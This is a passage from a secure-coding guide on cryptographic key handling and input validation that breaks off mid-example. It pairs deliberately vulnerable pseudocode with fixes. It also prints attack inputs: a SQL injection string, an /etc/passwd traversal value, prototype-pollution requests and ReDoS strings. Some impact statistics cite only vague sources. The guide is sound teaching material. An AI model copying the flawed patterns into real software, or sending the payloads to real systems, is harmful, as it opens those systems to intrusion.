provide secure defaults when used correctly + +--- + +### GOOD Example 5: Key Derivation Functions + +```pseudocode +// SECURE: PBKDF2 with sufficient iterations +function deriveKeyPBKDF2(password, purpose): + // Generate unique salt per derivation + salt = generateSecureRandom(16) + + // 600,000 iterations minimum for SHA-256 (2025) + iterations = 600000 + + // Derive key of required length + derivedKey = PBKDF2( + password = password, + salt = salt, + iterations = iterations, + keyLength = 32, // 256 bits + hashFunction = SHA256 + ) + + // Store salt with derived key for later verification + return {salt: salt, key: derivedKey} + +// SECURE: HKDF for deriving multiple keys from one secret +function deriveMultipleKeys(masterSecret, purpose): + // HKDF-Extract: Create pseudorandom key from input + salt = generateSecureRandom(32) + prk = HKDF_Extract(salt, masterSecret) + + // HKDF-Expand: Derive purpose-specific keys + encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32) + hmacKey = HKDF_Expand(prk, info = "authentication", length = 32) + searchKey = HKDF_Expand(prk, info = "search-index", length = 32) + + return { + encryption: encryptionKey, + hmac: hmacKey, + search: searchKey, + salt: salt // Store for re-derivation + } + +// SECURE: Argon2 for password-based key derivation +function deriveKeyFromPassword(password, salt = null): + if salt == null: + salt = generateSecureRandom(16) + + derivedKey = argon2id( + password = password, + salt = salt, + memoryCost = 65536, // 64 MB + timeCost = 3, + parallelism = 4, + outputLength = 32 + ) + + return {key: derivedKey, salt: salt} + +// SECURE: Key derivation with domain separation +function deriveKeyWithContext(masterKey, context, subkeyId): + // Context prevents cross-purpose key use + info = context + ":" + subkeyId + return HKDF_Expand(masterKey, info, 32) + +// Example: Derive per-user encryption keys +function getUserEncryptionKey(masterKey, userId): + return deriveKeyWithContext(masterKey, 
"user-data-encryption", userId) +``` + +**Why This Is Secure:** +- High iteration counts make brute-force impractical +- HKDF properly separates multiple keys from one source +- Domain separation prevents keys derived for one purpose being used for another +- Argon2 provides memory-hard protection against GPU attacks +- Unique salt per derivation prevents precomputation attacks + +--- + +### GOOD Example 6: Key Rotation Patterns + +```pseudocode +// SECURE: Key versioning for rotation +class KeyManager: + function __init__(keyStore): + this.keyStore = keyStore + this.currentKeyVersion = keyStore.getCurrentVersion() + + function encrypt(plaintext): + key = this.keyStore.getKey(this.currentKeyVersion) + nonce = generateSecureRandom(12) + + ciphertext = AES_GCM_encrypt(key, nonce, plaintext) + + // Include key version in output for decryption + return encodeVersionedCiphertext( + version = this.currentKeyVersion, + nonce = nonce, + ciphertext = ciphertext + ) + + function decrypt(encryptedData): + version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData) + + // Fetch correct key version (may be old version) + key = this.keyStore.getKey(version) + if key == null: + throw KeyNotFoundError("Key version " + version + " not available") + + return AES_GCM_decrypt(key, nonce, ciphertext) + + function rotateKey(): + newVersion = this.currentKeyVersion + 1 + newKey = generateSecureRandom(32) + this.keyStore.storeKey(newVersion, newKey) + this.currentKeyVersion = newVersion + + // Schedule background re-encryption of old data + scheduleReEncryption(newVersion - 1, newVersion) + +// SECURE: Re-encryption during key rotation +function reEncryptData(dataId, oldVersion, newVersion, keyManager): + // Fetch encrypted data + encryptedData = database.get("encrypted_data", dataId) + + // Verify it uses old key version + currentVersion = extractKeyVersion(encryptedData) + if currentVersion >= newVersion: + return // Already using new or newer key + + // Decrypt with old key, 
re-encrypt with new + plaintext = keyManager.decrypt(encryptedData) + newEncryptedData = keyManager.encrypt(plaintext) + + // Atomic update + database.update("encrypted_data", dataId, { + "data": newEncryptedData, + "key_version": newVersion, + "rotated_at": getCurrentTimestamp() + }) + +// SECURE: Key wrapping for storage +function storeEncryptionKey(keyToStore, masterKey): + // Wrap (encrypt) the key with master key + nonce = generateSecureRandom(12) + wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore) + + return { + wrapped_key: wrappedKey, + nonce: nonce, + algorithm: "AES-256-GCM", + created_at: getCurrentTimestamp() + } + +function retrieveEncryptionKey(wrappedKeyData, masterKey): + return AES_GCM_decrypt( + masterKey, + wrappedKeyData.nonce, + wrappedKeyData.wrapped_key + ) +``` + +**Why This Is Secure:** +- Key versioning allows old data to remain decryptable during rotation +- Background re-encryption gradually migrates all data to new key +- Key wrapping protects stored keys at rest +- Gradual rotation minimizes operational risk + +--- + +## Edge Cases Section + +### Edge Case 1: Padding Oracle Vulnerabilities + +```pseudocode +// VULNERABLE: Revealing padding validity in error messages +function decryptCBC_vulnerable(ciphertext, key, iv): + try: + plaintext = AES_CBC_decrypt(key, iv, ciphertext) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch PaddingError: + return {success: false, error: "Invalid padding"} // ORACLE! 
+ catch DecryptionError: + return {success: false, error: "Decryption failed"} + +// Attack: Padding oracle allows full plaintext recovery +// Attacker modifies ciphertext bytes, observes padding errors +// ~128 requests per byte to recover plaintext (on average) + +// SECURE: Encrypt-then-MAC - verify an HMAC before decrypting, using separate keys +function decryptCBC_secure(ciphertext, encKey, macKey, iv): + try: + // First verify HMAC before any decryption + providedHmac = ciphertext[-32:] + ciphertextData = ciphertext[:-32] + + expectedHmac = HMAC_SHA256(macKey, iv + ciphertextData) + if not constantTimeEquals(providedHmac, expectedHmac): + return {success: false, error: "Decryption failed"} // Generic error + + plaintext = AES_CBC_decrypt(encKey, iv, ciphertextData) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch: + return {success: false, error: "Decryption failed"} // Same error always + +// BEST: Just use GCM which prevents this class of attack entirely +``` + +**Lesson Learned:** +- Never reveal whether padding was valid or invalid +- Always use authenticated encryption (encrypt-then-MAC or GCM) +- Return identical errors for all decryption failures + +--- + +### Edge Case 2: Length Extension Attacks + +```pseudocode +// VULNERABLE: Using hash(secret + message) for authentication +function createAuthToken(secretKey, message): + return sha256(secretKey + message) // Length extension vulnerable! + +function verifyAuthToken(secretKey, message, token): + expected = sha256(secretKey + message) + return token == expected + +// Attack: Attacker knows hash(secret + message) and length of secret +// Can compute hash(secret + message + padding + attacker_data) +// Without knowing the secret! + +// Example attack: +// Original: hash(secret + "amount=100") = abc123... +// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999") +// Server verifies this as valid! 
+ +// SECURE: Use HMAC +function createAuthTokenSecure(secretKey, message): + return HMAC_SHA256(secretKey, message) + +function verifyAuthTokenSecure(secretKey, message, token): + expected = HMAC_SHA256(secretKey, message) + return constantTimeEquals(token, expected) + +// WEAKER ALTERNATIVE: hash(message + secret) blocks extension, but a hash collision on the message forges tokens - prefer HMAC +// SECURE: Use SHA-3/SHA-512/256 (resistant to length extension) +function alternativeAuth(secretKey, message): + return SHA3_256(secretKey + message) // SHA-3 is resistant +``` + +**Lesson Learned:** +- Never use hash(key + message) for authentication +- HMAC is specifically designed to prevent length extension +- SHA-3 family is resistant but HMAC is still recommended for consistency + +--- + +### Edge Case 3: Timing Attacks on Comparison + +```pseudocode +// VULNERABLE: Early-exit string comparison +function verifyToken(providedToken, expectedToken): + if length(providedToken) != length(expectedToken): + return false + for i in range(length(providedToken)): + if providedToken[i] != expectedToken[i]: + return false // Early exit reveals position of first difference + return true + +// Attack: Timing differences reveal correct characters +// Correct first char: comparison runs slightly longer than for a wrong first char +// (tiny per request, but measurable statistically over many requests) +// Attacker can brute-force character-by-character + +// VULNERABLE: Using == operator (language-dependent timing) +function checkHmac(provided, expected): + return provided == expected // May have variable-time implementation + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Early return leaks only the length, which is public for fixed-size MACs + // For variable-length secrets, hash both sides first so lengths match + return false + + result = 0 + for i in range(length(a)): + // XOR and OR accumulate differences without early exit + result = result | (a[i] XOR b[i]) + return result == 0 + +// SECURE: Using crypto library comparison +function verifyHmacSecure(message, providedHmac, key): + expectedHmac = HMAC_SHA256(key, 
message) + return crypto.timingSafeEqual(providedHmac, expectedHmac) + +// SECURE: Double-HMAC comparison (timing-safe by design) +function verifyWithDoubleHmac(message, providedMac, key): + expectedMac = HMAC_SHA256(key, message) + // Compare HMACs of the MACs - timing doesn't leak original MAC + return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac) +``` + +**Lesson Learned:** +- Use constant-time comparison for all secret-dependent operations +- Most languages have crypto libraries with timing-safe functions +- Double-HMAC trick works when constant-time compare isn't available + +--- + +### Edge Case 4: Key Reuse Across Contexts + +```pseudocode +// VULNERABLE: Same key for encryption and authentication +SHARED_KEY = loadKey("master") + +function encryptData(data): + return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data) + +function signData(data): + return HMAC_SHA256(SHARED_KEY, data) // Same key! + +// Problem: Cryptographic interactions between uses +// Some attacks become possible when key is used in multiple algorithms + +// VULNERABLE: Same key for different users/tenants +function encryptForTenant(tenantId, data): + return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data) + // All tenants share encryption key - one compromise = all compromised + +// SECURE: Derive separate keys for each purpose +MASTER_KEY = loadKey("master") + +function getEncryptionKey(): + return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32) + +function getAuthenticationKey(): + return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32) + +function getSearchKey(): + return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32) + +// SECURE: Per-tenant key derivation +function getTenantEncryptionKey(tenantId): + // Each tenant gets unique derived key + info = "tenant-encryption:" + tenantId + return HKDF_Expand(MASTER_KEY, info, 32) + +function encryptForTenantSecure(tenantId, data): + tenantKey = getTenantEncryptionKey(tenantId) + return 
AES_GCM_encrypt(tenantKey, generateNonce(), data) +``` + +**Lesson Learned:** +- Always derive separate keys for different cryptographic operations +- Use domain separation (different "info" parameters) in HKDF +- Per-tenant/per-user key derivation limits blast radius of compromise + +--- + +## Common Mistakes Section + +### Common Mistake 1: Using Encryption Without Authentication + +```pseudocode +// COMMON MISTAKE: CBC encryption without HMAC +function encryptDataWrong(data, key): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(key, iv, data) + return iv + ciphertext + // Missing: No way to detect tampering! + +// Attack: Bit-flipping in CBC mode +// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1] +// Attacker can modify data without detection + +// Example: Encrypted JSON {"admin": false, "amount": 100} +// Attacker can flip bits to change "false" to "true" or modify amount + +// CORRECT: Encrypt-then-MAC +function encryptDataCorrect(data, encKey, macKey): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(encKey, iv, data) + + // MAC covers IV and ciphertext + mac = HMAC_SHA256(macKey, iv + ciphertext) + + return iv + ciphertext + mac + +function decryptDataCorrect(encrypted, encKey, macKey): + iv = encrypted[:16] + mac = encrypted[-32:] + ciphertext = encrypted[16:-32] + + // Verify MAC FIRST, before any decryption + expectedMac = HMAC_SHA256(macKey, iv + ciphertext) + if not constantTimeEquals(mac, expectedMac): + throw IntegrityError("Data has been tampered with") + + return AES_CBC_decrypt(encKey, iv, ciphertext) + +// BETTER: Just use GCM which includes authentication +function encryptDataBest(data, key): + nonce = generateSecureRandom(12) + ciphertext, tag = AES_GCM_encrypt(key, nonce, data) + return nonce + ciphertext + tag +``` + +**Solution:** +- Always use authenticated encryption (GCM, ChaCha20-Poly1305) +- If using CBC, add HMAC with encrypt-then-MAC pattern +- Verify authentication tag 
BEFORE decryption + +--- + +### Common Mistake 2: Confusing Encoding with Encryption + +```pseudocode +// COMMON MISTAKE: Base64 as "encryption" +function "encrypt"Data(sensitiveData): + return base64Encode(sensitiveData) // NOT ENCRYPTION! + +function "decrypt"Data(encodedData): + return base64Decode(encodedData) + +// COMMON MISTAKE: XOR with short key as encryption +function "encrypt"WithXor(data, password): + key = password.repeat(ceil(length(data) / length(password))) + return xor(data, key) // Trivially broken with frequency analysis + +// COMMON MISTAKE: ROT13 or character substitution +function "encrypt"Text(text): + return rot13(text) // No security at all + +// COMMON MISTAKE: Obfuscation ≠ encryption +function storeApiKey(apiKey): + obfuscated = "" + for char in apiKey: + obfuscated += chr(ord(char) + 5) // Just shifted characters + return obfuscated + +// COMMON MISTAKE: Custom "encryption" algorithm +function myEncrypt(data, key): + result = "" + for i, char in enumerate(data): + newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256) + result += newChar + return result // Easily broken - don't invent crypto! +``` + +**Reality Check:** +| Method | Security Level | Use Case | +|--------|----------------|----------| +| Base64 | 0 (None) | Binary-to-text encoding only | +| ROT13 | 0 (None) | Jokes, spoiler hiding | +| XOR with repeated key | Trivially broken | Never use | +| Homegrown "encryption" | Unknown, likely broken | Never use | +| AES-GCM with random key | Strong | Actual encryption | + +**Solution:** +- Use standard algorithms: AES-GCM, ChaCha20-Poly1305 +- Never invent cryptographic algorithms +- Encoding (Base64, hex) is for representation, not security + +--- + +### Common Mistake 3: Improper Key Storage After Generation + +```pseudocode +// COMMON MISTAKE: Logging the key +function generateAndStoreKey(): + key = generateSecureRandom(32) + log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED! 
+ return key + +// COMMON MISTAKE: Key in config file committed to git +// config.json: +{ + "database_url": "...", + "encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever +} + +// COMMON MISTAKE: Key set inline on the command line as an environment variable +// Launching: ENCRYPTION_KEY=secret123 ./myapp (saved in shell history) +// `ps auxe` or /proc/<pid>/environ exposes it to the same user and to root + +// COMMON MISTAKE: Key stored in database alongside encrypted data +function storeEncryptedData(userId, sensitiveData): + key = generateSecureRandom(32) + encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData) + database.insert("user_data", { + user_id: userId, + encrypted_data: encrypted, + encryption_key: key // KEY NEXT TO DATA = pointless encryption + }) + +// COMMON MISTAKE: Key derivation material stored insecurely +function setupEncryption(password): + salt = generateSecureRandom(16) + key = deriveKey(password, salt) + + // Storing in easily accessible location + localStorage.setItem("encryption_salt", salt) + localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE! 
+``` + +**Secure Key Storage Patterns:** +```pseudocode +// SECURE: Using a key management service (KMS) +function storeKeySecurely(keyId, keyMaterial): + // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault + kms.storeKey(keyId, keyMaterial, { + rotation_period: "90 days", + deletion_protection: true, + access_policy: restrictedPolicy + }) + +// SECURE: Key wrapped with hardware security module (HSM) +function wrapKeyForStorage(dataKey): + wrappingKey = hsm.getWrappingKey() // Never leaves HSM + wrappedKey = hsm.wrapKey(dataKey, wrappingKey) + return wrappedKey // Safe to store - can only unwrap with HSM + +// SECURE: Envelope encryption pattern +function envelopeEncrypt(data): + // Generate data encryption key (DEK) + dek = generateSecureRandom(32) + + // Encrypt data with DEK + encryptedData = AES_GCM_encrypt(dek, generateNonce(), data) + + // Encrypt DEK with key encryption key (KEK) from KMS + encryptedDek = kms.encrypt(dek) + + // Store encrypted DEK with encrypted data + return { + encrypted_data: encryptedData, + encrypted_key: encryptedDek, // DEK is encrypted, safe to store + kms_key_id: kms.getCurrentKeyId() + } +``` + +--- + +## Algorithm Selection Guidance + +### Symmetric Encryption + +| Algorithm | Key Size | Use Case | Notes | +|-----------|----------|----------|-------| +| **AES-256-GCM** | 256 bits | General purpose | Recommended default, 96-bit nonce | +| **ChaCha20-Poly1305** | 256 bits | Performance-sensitive, mobile | Faster without AES-NI hardware | +| **XChaCha20-Poly1305** | 256 bits | High-volume encryption | 192-bit nonce, safe for random generation | +| **AES-256-GCM-SIV** | 256 bits | Nonce-misuse resistant | Slightly slower, safer with accidental reuse | + +**Avoid:** DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC + +### Password Hashing + +| Algorithm | Memory | Use Case | Notes | +|-----------|--------|----------|-------| +| **Argon2id** | 64+ MB | New applications | Best protection, memory-hard | +| **bcrypt** | N/A | 
Legacy compatibility | Widely supported, cost 12+ | +| **scrypt** | 64+ MB | When Argon2 unavailable | Good alternative | + +**Avoid:** MD5, SHA1, SHA256 (single round), PBKDF2 with <600k iterations + +### Key Derivation + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Argon2id** | Password-based | Best for password → key | +| **HKDF** | Key expansion | Deriving multiple keys from one | +| **PBKDF2-SHA256** | Compatibility | 600k+ iterations required | + +**Avoid:** MD5-based KDF, single-hash derivation, low iteration counts + +### Message Authentication + +| Algorithm | Output | Use Case | Notes | +|-----------|--------|----------|-------| +| **HMAC-SHA256** | 256 bits | General purpose | Standard choice | +| **HMAC-SHA512** | 512 bits | Extra security margin | Faster on 64-bit | +| **Poly1305** | 128 bits | With ChaCha20 | Part of AEAD | + +**Avoid:** MD5, SHA1, plain hash without HMAC construction + +### Digital Signatures + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Ed25519** | General purpose | Fast, secure, simple API | +| **ECDSA P-256** | Compatibility | Widely supported | +| **RSA-PSS** | Legacy systems | 2048+ bit key required | + +**Avoid:** RSA PKCS#1 v1.5, DSA, ECDSA with weak curves + +--- + +## Detection Hints: How to Spot Cryptographic Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in cryptographic code: + +// 1. Weak hash functions +md5( // Search for: md5\s*\( +sha1( // Search for: sha1\s*\( +SHA1.Create() // Search for: SHA1 + +// 2. ECB mode +mode = "ECB" // Search for: ECB +AES/ECB/ // Search for: /ECB/ +mode_ECB // Search for: ECB + +// 3. Static or weak IVs +iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0 +IV = "0000 // Search for: IV\s*=\s*["']0 +static IV // Search for: static.*[Ii][Vv] + +// 4. Math.random for security +Math.random() // Search for: Math\.random +random.randint( // Search for: randint\( (context matters) + +// 5. 
Weak secrets += "secret" // Search for: =\s*["']secret +SECRET = " // Search for: SECRET\s*=\s*["'] += "password" // Search for: =\s*["']password + +// 6. Direct password use as key +key = password // Search for: key\s*=\s*password +AES(password) // Search for: AES\s*\(\s*password + +// 7. Low iteration counts +iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9] +rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9] + +// GREP patterns for security review: +// [Mm][Dd]5\s*\( +// [Ss][Hh][Aa]1\s*\( +// ECB +// [Ii][Vv]\s*=\s*\[0 +// Math\.random +// iterations.*[0-9]{1,4}[^0-9] +// (password|secret)\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Cryptographic security test cases: + +// 1. Algorithm verification +- [ ] No MD5 or SHA1 for password hashing +- [ ] No ECB mode encryption +- [ ] AES key size is 256 bits (not 128) +- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305) + +// 2. Randomness verification +- [ ] IVs/nonces are cryptographically random +- [ ] Session tokens use CSPRNG +- [ ] No predictable seeds for random generation + +// 3. Key management +- [ ] Keys not hardcoded in source +- [ ] Keys not logged or exposed in errors +- [ ] Key derivation uses appropriate KDF +- [ ] Key rotation mechanism exists + +// 4. Password hashing +- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params +- [ ] Unique salt per password +- [ ] Timing-safe comparison used + +// 5. 
Implementation details +- [ ] Constant-time comparison for secrets +- [ ] No padding oracle vulnerabilities +- [ ] HMAC used (not hash(key+message)) +- [ ] Authenticated encryption or encrypt-then-MAC +``` + +--- + +## Security Checklist + +- [ ] Password hashing uses Argon2id, bcrypt (cost 12+), or scrypt +- [ ] All passwords have unique, random salts (automatically handled by bcrypt/Argon2) +- [ ] No MD5, SHA1, or single-round SHA256 for security-sensitive hashing +- [ ] Encryption uses authenticated modes (AES-GCM, ChaCha20-Poly1305) +- [ ] No ECB mode encryption +- [ ] IVs/nonces generated with cryptographically secure random +- [ ] Each encryption operation uses unique IV/nonce +- [ ] GCM nonces tracked to prevent reuse (or use SIV modes) +- [ ] All random values for security use CSPRNG (crypto.randomBytes, secrets module) +- [ ] No Math.random() or similar PRNGs for security +- [ ] Encryption keys are 256 bits and properly random +- [ ] No hardcoded keys in source code +- [ ] Keys derived with HKDF, PBKDF2 (600k+ iterations), or Argon2 +- [ ] Separate keys derived for different cryptographic operations +- [ ] Key rotation mechanism implemented +- [ ] Keys stored in KMS, HSM, or encrypted at rest +- [ ] Timing-safe comparison used for all secret comparisons +- [ ] HMAC used instead of hash(key+message) +- [ ] Error messages don't reveal cryptographic details (padding validity, etc.) 
+- [ ] No custom cryptographic algorithms—only standard, vetted primitives + +--- + +# Pattern 6: Input Validation and Data Sanitization + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index) + +**Priority Score:** 21 (Frequency: 9, Severity: 7, Detectability: 5) + +--- + +## Introduction: The Foundation That AI Frequently Skips + +Input validation is the **first line of defense** against virtually all injection attacks, data corruption, and application crashes. Yet AI-generated code consistently fails to implement proper validation, treating it as an afterthought or skipping it entirely. + +**Why AI Models Skip or Fail at Input Validation:** + +1. **Training Data Focuses on "Happy Path":** Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected inputs. Validation code is often omitted for brevity, teaching AI that it's optional. + +2. **Validation Is Contextual:** Proper validation depends on business rules, data types, and downstream usage—context that AI often lacks. The model can't know that a "name" field shouldn't exceed 100 characters or that an "age" must be between 0 and 150. + +3. **Client-Side Validation Appears Complete:** AI training data often contains client-side form validation (JavaScript). The model learns these patterns but fails to understand that server-side validation is the actual security boundary. + +4. **Regex Complexity:** AI generates complex regex patterns that may be vulnerable to catastrophic backtracking (ReDoS) or miss edge cases. The model optimizes for matching expected patterns, not rejecting malicious ones. + +5. **Trust Boundary Confusion:** AI doesn't inherently understand which data sources are trustworthy. 
It may validate user form input but trust data from internal APIs, databases, or message queues that could also be compromised. + +6. **Type System Overconfidence:** In typed languages, AI may assume type declarations are sufficient validation, missing the need for range checks, format validation, and semantic constraints. + +**Why This Matters - The Foundation of All Injection Attacks:** + +Every major vulnerability class depends on inadequate input validation: +- **SQL Injection:** Unvalidated input in queries +- **Command Injection:** Unvalidated input in shell commands +- **XSS:** Unvalidated input rendered in HTML +- **Path Traversal:** Unvalidated file paths +- **Deserialization Attacks:** Unvalidated serialized objects +- **Buffer Overflows:** Unvalidated input lengths +- **Business Logic Bypass:** Unvalidated business constraints + +**Impact Statistics:** +- CWE-20 (Improper Input Validation) appears in OWASP Top 10 as a root cause of multiple vulnerabilities +- 42% of SQL injection vulnerabilities trace back to missing input validation (NIST NVD analysis) +- ReDoS vulnerabilities increased 143% year-over-year in npm packages (Snyk 2024) +- 67% of AI-generated validation code only validates on the client side (Security research 2025) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: Client-Side Only Validation + +```pseudocode +// VULNERABLE: All validation in frontend, server trusts everything + +// Frontend validation (JavaScript) +function validateForm(form): + if form.email is empty: + showError("Email required") + return false + + if not isValidEmail(form.email): + showError("Invalid email format") + return false + + if form.password.length < 8: + showError("Password must be 8+ characters") + return false + + if form.age < 0 or form.age > 150: + showError("Invalid age") + return false + + // Form is "valid", submit to server + return true + +// Backend endpoint (VULNERABLE - no validation) +function handleRegistration(request): 
+ // AI assumes frontend validated, so just use the data + email = request.body.email // Could be anything + password = request.body.password // Could be empty + age = request.body.age // Could be -1 or 9999999 + + // Directly store in database + query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)" + database.execute(query, [email, hashPassword(password), age]) + + return {"success": true} +``` + +**Why This Is Dangerous:** +- Attackers bypass JavaScript by sending direct HTTP requests (curl, Postman, scripts) +- Browser dev tools allow modifying form data before submission +- Server receives arbitrary data with no protection +- Data integrity issues cascade through the application +- SQL injection still possible if query construction is vulnerable elsewhere + +**Attack Scenario:** +```pseudocode +// Attacker sends directly to API: +POST /api/register +Content-Type: application/json + +{ + "email": "'; DROP TABLE users; --", + "password": "", + "age": -9999999999 +} +``` + +--- + +### BAD Example 2: Partial Validation (Type but Not Range) + +```pseudocode +// VULNERABLE: Validates type exists, ignores business constraints + +function processPayment(request): + // Type checking only + if typeof(request.amount) != "number": + return error("Amount must be a number") + + if typeof(request.quantity) != "integer": + return error("Quantity must be an integer") + + // MISSING: Range validation + // amount could be negative (refund attack) + // quantity could be 0 or MAX_INT (business logic bypass) + + total = request.amount * request.quantity + chargeCustomer(request.customerId, total) + + return {"charged": total} + +// Attacker exploits: +{ + "amount": -100.00, // Negative = credit instead of charge + "quantity": 999999999, // Integer overflow potential + "customerId": "12345" +} +``` + +**Why This Is Dangerous:** +- Type validation is necessary but not sufficient +- Business logic depends on reasonable ranges +- Integer overflow can wrap to unexpected 
values +- Negative values can invert expected behavior +- Zero values can bypass payment or cause division errors + +--- + +### BAD Example 3: Regex Without Anchors + +```pseudocode +// VULNERABLE: Regex matches substring, not entire input + +// Email validation without anchors +EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" + +function validateEmail(email): + if regex.match(EMAIL_PATTERN, email): + return true + return false + +// This PASSES validation: +validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD") +// Because "user@example.com" matches somewhere in the string + +// Filename validation without anchors +SAFE_FILENAME = "[a-zA-Z0-9_-]+" + +function validateFilename(filename): + if regex.match(SAFE_FILENAME, filename): + return true + return false + +// This PASSES validation: +validateFilename("../../../etc/passwd") +// Because "etc" matches the pattern somewhere in the string +``` + +**Why This Is Dangerous:** +- Regex matches anywhere in string, not the complete input +- Injection payloads can surround or precede valid patterns +- Path traversal bypasses filename validation +- Email field can contain XSS payloads around valid address +- Common in AI-generated code which copies regex patterns without anchors + +**Fix Preview:** +```pseudocode +// SECURE: Use ^ and $ anchors to match entire input +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$" +SAFE_FILENAME = "^[a-zA-Z0-9_-]+$" +``` + +--- + +### BAD Example 4: ReDoS-Vulnerable Patterns + +```pseudocode +// VULNERABLE: Catastrophic backtracking regex patterns + +// Email validation with ReDoS vulnerability +// Pattern: nested quantifiers with overlapping character classes +VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$" + +// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" 
+// The regex engine backtracks exponentially trying all combinations + +// URL validation with ReDoS +VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$" + +// Attack input: long string of valid URL characters followed by invalid character +// "http://example.com/" + "a" * 30 + "!" + +// Naive duplicate word finder (common tutorial example) +DUPLICATE_WORDS = "\b(\w+)\s+\1\b" +// Can hang on: "word word word word word word word word word word!" + +function validateInput(input, pattern): + // This can hang for minutes or crash the server + return regex.match(pattern, input) +``` + +**Why This Is Dangerous:** +- Single malicious request can consume 100% CPU for minutes +- Denial of Service without requiring many requests +- AI copies these patterns from tutorials without understanding complexity +- Nested quantifiers `(a+)+`, `(a*)*`, `(a?)*` are red flags +- Overlapping character classes compound the problem + +**ReDoS Complexity Analysis:** +```pseudocode +// Pattern: (a+)+$ +// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX" +// +// For 25 'a's followed by 'X': +// - The engine tries every possible way to split the 'a's between groups +// - Time complexity: O(2^n) where n is input length +// - 25 chars = 33 million+ combinations to try +// - 30 chars = 1 billion+ combinations +``` + +--- + +### BAD Example 5: Missing Null/Undefined Checks + +```pseudocode +// VULNERABLE: Assumes data structure completeness + +function processUserProfile(user): + // No null checks - any missing field crashes + fullName = user.firstName + " " + user.lastName // Crash if null + + emailDomain = user.email.split("@")[1] // Crash if email is null + + age = parseInt(user.profile.age) // Crash if profile is null + + // Process address (deeply nested) + city = user.profile.address.city.toUpperCase() // Multiple crash points + + return { + "name": fullName, + "domain": emailDomain, + "age": age, + "city": city + } + +// API returns partial data: +{ + "firstName": "John", + 
"lastName": null, // Could be null + "email": null, // Could be missing + "profile": { + "age": "25" + // address is missing entirely + } +} +``` + +**Why This Is Dangerous:** +- Application crashes reveal error messages to attackers +- Null pointer exceptions can leak stack traces +- Partial data from APIs, databases, or user input is common +- AI assumes training data structures are always complete +- Cascading failures when one field is null + +--- + +### BAD Example 6: Trusting Array Indices from User Input + +```pseudocode +// VULNERABLE: Using user input directly as array index + +function getItemByIndex(request): + items = ["item0", "item1", "item2", "item3", "item4"] + index = request.params.index // User-provided + + // No validation - trusts user to provide valid index + return items[index] // Out of bounds or negative index + +// Worse: Array index used for data access +function getUserData(request): + userIndex = parseInt(request.params.id) + + // Could access negative index, other users' data, or crash + return allUsersData[userIndex] + +// Object property access from user input +function getConfigValue(request): + configKey = request.params.key + + // Prototype pollution or access to __proto__, constructor + return config[configKey] +``` + +**Why This Is Dangerous:** +- Negative indices wrap to end of array in some languages +- Out-of-bounds access crashes or returns undefined behavior +- Integer overflow can produce unexpected indices +- Object property access allows prototype pollution +- `__proto__`, `constructor`, `prototype` keys can modify object behavior + +**Attack Scenarios:** +```pseudocode +// Array out of bounds: +GET /items?index=99999999 +GET /items?index=-1 + +// Prototype pollution via property access: +GET /config?key=__proto__ +GET /config?key=constructor +POST /config {"key": "__proto__", "value": {"isAdmin": true}} +``` + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Server-Side Validation Patterns + 
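A runnable counterpart to the pseudocode in this example, as a minimal Python sketch. The function name `validate_registration`, the `EMAIL_RE` pattern, and the exact limits are illustrative assumptions rather than part of any framework; business rules such as allowed email domains and password complexity are left out.

```python
import re

# Assumed pattern for this sketch: bounded repetition, used with fullmatch()
# so the whole input must match (no substring matches).
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,63}"
)


def validate_registration(body):
    """Return a list of {"field", "message"} errors; an empty list means valid."""
    if not isinstance(body, dict):
        return [{"field": "body", "message": "Expected a JSON object"}]

    errors = []

    def fail(field, message):
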